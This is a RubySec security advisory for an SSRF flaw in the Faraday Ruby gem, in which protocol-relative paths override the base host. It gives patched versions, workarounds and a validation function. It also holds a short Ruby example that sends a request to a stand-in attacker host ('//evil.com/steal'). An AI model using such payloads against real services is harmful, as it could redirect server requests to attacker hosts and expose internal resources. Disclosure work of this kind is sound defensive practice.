CVE-2026-25765 (faraday): Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

ADVISORIES

GEM

faraday

SEVERITY

CVSS v3.x: 5.8 (Medium)

PATCHED VERSIONS

>= 2.14.1

DESCRIPTION

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(), post(), build_url(), or other request methods, an attacker can supply a protocol-relative URL like //attacker.com/endpoint to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with /, so protocol-relative URLs bypass it entirely.

Example

conn = Faraday.new(url: &apos;https://api.internal.com&apos;)
conn.get(&apos;//evil.com/steal&apos;)
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to Faraday request methods. Specifically:

Reject or strip input that starts with // followed by a non-/ character.
Use an allowlist of permitted path prefixes.
Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday.

Example validation:

def safe_path(user_input)
  raise ArgumentError, &quot;Invalid path&quot; if user_input.match?(r{\A//[^/]})
   user_input
end

RubySec